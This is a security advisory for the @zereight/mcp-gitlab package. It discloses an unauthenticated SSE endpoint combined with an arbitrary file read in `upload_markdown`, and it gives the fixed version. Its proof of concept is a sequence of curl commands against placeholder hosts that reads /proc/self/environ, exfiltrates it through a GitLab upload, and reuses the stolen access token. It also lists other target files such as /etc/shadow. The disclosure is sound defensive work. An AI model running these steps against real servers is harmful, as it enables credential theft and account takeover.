GHSA-cv3r-c5h8-f4g5
@zereight/mcp-gitlab: Unauthenticated arbitrary file read via `upload_markdown` enables PAT exfiltration and full account takeover
Quick fix
GHSA-cv3r-c5h8-f4g5 — @zereight/mcp-gitlab: upgrade to the fixed version with the command below.
npm install @zereight/mcp-gitlab@2.1.27Details
### Summary
The SSE transport mode (`SSE=true`) exposes all MCP tools without any authentication. The `upload_markdown` tool reads arbitrary files from the server's local filesystem via an unsanitized `file_path` parameter and uploads them to a GitLab project. Combined, any unauthenticated network-reachable attacker can read `/proc/self/environ` to steal the server's `GITLAB_PERSONAL_ACCESS_TOKEN` and achieve full GitLab account takeover. This is the default configuration for Docker deployments.
### Details
Two issues chain together:
**1. No authentication on SSE transport (`src/index.ts:7350-7388`)**
When `SSE=true` (the intended mode for Docker deployments per `docker-compose.yaml`), the `/sse` and `/messages` endpoints have zero authentication middleware. Any HTTP client that can reach the port can establish a session and invoke all ~100+ tools using the server's configured PAT.
```typescript // src/index.ts:7354 — no auth check app.get("/sse", async (_: Request, res: Response) => { const serverInstance = createServer(); const transport = new SSEServerTransport("/messages", res); await serverInstance.connect(transport); }); ```
Remote Authorization (`REMOTE_AUTHORIZATION=true`) is explicitly incompatible with SSE mode (`src/index.ts:1833-1839`), so there is no way to add per-request auth in this transport.
**2. Arbitrary file read in `upload_markdown` (`src/index.ts:5461-5503`)**
The `upload_markdown` tool calls `fs.readFileSync(filePath)` where `filePath` comes directly from user input with no validation. The Zod schema (`src/schemas.ts:2150-2153`) defines `file_path` as `z.string()` with no path restrictions, allowlists, or sandboxing.
```typescript async function markdownUpload(projectId: string, filePath: string) { if (!fs.existsSync(filePath)) { throw new Error(`File not found: ${filePath}`); } const fileBuffer = fs.readFileSync(filePath); // Arbitrary file read — no path validation // ... uploads to GitLab project via POST /projects/:id/uploads } ```
This tool is in the `users` toolset, which is **enabled by default**.
**Docker amplification:** The `Dockerfile` has no `USER` directive, so the process runs as root. The `docker-compose.yaml` maps `3002:3002`, which binds `0.0.0.0` by default, exposing the unauthenticated endpoint to the network.
### PoC
**Prerequisites:** - A running `@zereight/mcp-gitlab` instance with `SSE=true` and `GITLAB_PERSONAL_ACCESS_TOKEN` set (this is the default Docker deployment config) - Network access to the server's port (default: 3002) - A GitLab project ID the PAT has write access to (use `list_projects` to enumerate)
**Steps:**
```bash # 1. Connect to the unauthenticated SSE endpoint and capture the session ID SESSION_ID=$(curl -s -N http://<HOST>:3002/sse | head -1 | grep -oP 'sessionId=\K[^&\s]+')
# 2. (Optional) Enumerate accessible projects to find a writable project ID curl -X POST "http://<HOST>:3002/messages?sessionId=$SESSION_ID" \ -H "Content-Type: application/json" \ -d '{ "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "list_projects", "arguments": {"owned": true} } }'
# 3. Read /proc/self/environ (contains GITLAB_PERSONAL_ACCESS_TOKEN in plaintext) # and upload it to a GitLab project curl -X POST "http://<HOST>:3002/messages?sessionId=$SESSION_ID" \ -H "Content-Type: application/json" \ -d '{ "jsonrpc": "2.0", "id": 2, "method": "tools/call", "params": { "name": "upload_markdown", "arguments": { "project_id": "<WRITABLE_PROJECT_ID>", "file_path": "/proc/self/environ" } } }'
# 4. The response contains a GitLab upload URL like: # {"markdown": "", "url": "/uploads/abc123def456/environ"} # # 5. Retrieve the uploaded file from GitLab: curl "https://gitlab.example.com/<namespace>/<project>/uploads/abc123def456/environ"
# 6. The file contains NUL-separated environment variables including: # GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxxxxxxxxxxxxxxxxx # # 7. Use the stolen PAT for full GitLab API access: curl -H "Private-Token: glpat-xxxxxxxxxxxxxxxxxxxx" "https://gitlab.example.com/api/v4/user" ```
**Other exfiltrable targets (running as root in Docker):**
| File | Contents | |---|---| | `/proc/self/environ` | All env vars including `GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxx` | | `/proc/self/cmdline` | Command line args (token if passed via CLI) | | `/etc/shadow` | System password hashes | | `/app/build/index.js` | Full application source code | | `~/.gitlab-mcp-token.json` | OAuth tokens (if OAuth mode was used) |
### Impact
**Unauthenticated full GitLab account takeover.** Any attacker with network access to the MCP server port can steal the Personal Access Token and gain complete access to the GitLab instance as the token owner - including all repositories, CI/CD secrets and variables, deploy keys, project settings, and admin functions if the user has admin privileges. No credentials or user interaction are required. This is the default configuration for Docker deployments
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/zereight/gitlab-mcp/security/advisories/GHSA-cv3r-c5h8-f4g5[WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2026-61560[ADVISORY]
- https://github.com/zereight/gitlab-mcp/pull/482[WEB]
- https://github.com/zereight/gitlab-mcp/pull/554[WEB]
- https://github.com/zereight/gitlab-mcp/pull/622[WEB]
- https://github.com/zereight/gitlab-mcp/commit/e436ee4ad067b64584ec9312c9e9c9a2641c1976[WEB]
- https://github.com/zereight/gitlab-mcp[PACKAGE]
- https://github.com/zereight/gitlab-mcp/releases/tag/v2.1.27[WEB]